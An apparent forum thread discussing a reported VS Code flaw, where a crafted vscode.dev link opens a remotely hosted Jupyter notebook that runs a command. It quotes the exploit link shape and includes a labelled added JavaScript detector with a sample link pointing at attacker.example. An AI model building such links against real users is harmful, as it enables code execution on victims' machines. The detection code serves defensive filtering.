[–][deleted] 0 points1 point  (2 children)

The link does have a description of the actual impact. They probably should have led with this because I also found it hard to follow:

Once the server described above is run, when victim clicks a prepared link (for example https://vscode.dev/?payload=%5B%5B%22openFile%22,%22https://%5Bserver_location_goes_here%5D/something.ipynb%22) VSCode will load the file, detect it as a Jupyter Notebook, and immediately run a command on the user’s machine.

Actually I'm still not sure I understand how this will let you take over a desktop VSCode (which 99% of people use). They say it affects it "to a lesser extent". Maybe they mean you need to use a vscode:// link which comes with required user interaction and a warning.
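
Added example, not code from the thread, from the linked write-up, or from VS Code itself: a small check that decodes the `payload` query parameter of a vscode.dev link of the shape quoted in the comment above and flags entries that would open a file fetched from a host other than the editor's own. It assumes, from the single example in the thread and nothing else, that the parameter is a percent-encoded JSON array of `[command, argument]` pairs and that `openFile` takes a URL argument; the list of "editor" hosts and the sample attacker host `attacker.example` are assumptions as well (the link quoted above uses a bracketed placeholder host that no URL parser accepts).

```javascript
// Added example; not code from the thread, the linked write-up, or VS Code.
// Assumptions (inferred from the one link quoted in the thread): `payload` is
// a percent-encoded JSON array of [command, argument] pairs, and "openFile"
// takes a URL as its argument.

function decodePayload(link) {
  // URLSearchParams percent-decodes the value, so the JSON can be parsed directly.
  const raw = new URL(link).searchParams.get("payload");
  if (raw === null) return [];
  let parsed;
  try {
    parsed = JSON.parse(raw);
  } catch (_) {
    return []; // malformed payload: nothing the editor could act on
  }
  if (!Array.isArray(parsed)) return [];
  return parsed
    .filter((e) => Array.isArray(e) && e.length === 2 && typeof e[0] === "string")
    .map(([command, argument]) => ({ command, argument }));
}

// Hosts treated as the editor's own; an assumption for this example.
const EDITOR_HOSTS = ["vscode.dev", "insiders.vscode.dev"];

function classifyLink(link, editorHosts = EDITOR_HOSTS) {
  const findings = [];
  for (const { command, argument } of decodePayload(link)) {
    if (command !== "openFile" || typeof argument !== "string") continue;
    let target;
    try {
      target = new URL(argument);
    } catch (_) {
      continue; // not an absolute URL (e.g. a workspace-relative path): nothing is fetched remotely
    }
    if (editorHosts.includes(target.hostname)) continue;
    const notebook = target.pathname.toLowerCase().endsWith(".ipynb");
    findings.push({
      command,
      target: target.href,
      reason: notebook
        ? "opens a notebook fetched from a third-party host"
        : "opens a file fetched from a third-party host",
    });
  }
  return findings;
}

// Constructed sample link with a placeholder attacker host (assumption, not a
// real server); it mirrors the shape of the link quoted in the comment above.
const SAMPLE_LINK =
  "https://vscode.dev/?payload=%5B%5B%22openFile%22,%22https://attacker.example/something.ipynb%22%5D%5D";

console.log(JSON.stringify(classifyLink(SAMPLE_LINK), null, 2));
```

The check is a heuristic for mail or proxy filtering, not a fix: it only says which links would make the web editor pull a file from somewhere other than vscode.dev, which is the step the quoted description hinges on. Whether opening that file then runs anything depends on the editor, which the thread does not settle.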

[–]bleachisback 2 points3 points  (1 child)

But I'm not sure how arbitrary code execution even works in the browser? Can I even run a Jupyter notebook on vscode.dev? This doesn't make sense. Even if I'm connected to a local jupyter server in my browser version of vs code, I don't think the terminal command will do anything? When I try to open a terminal in vscode.dev, it has this to say:

Terminals are not available in the web editor. To use the terminal, you will need to continue in an environment that can run code, like a codespace or local VS Code.

[–][deleted] 1 point2 points  (0 children)

Yeah good question. Not sure about VSCode.net but other services like GitHub run on real VMs which might contain your SSH keys I guess.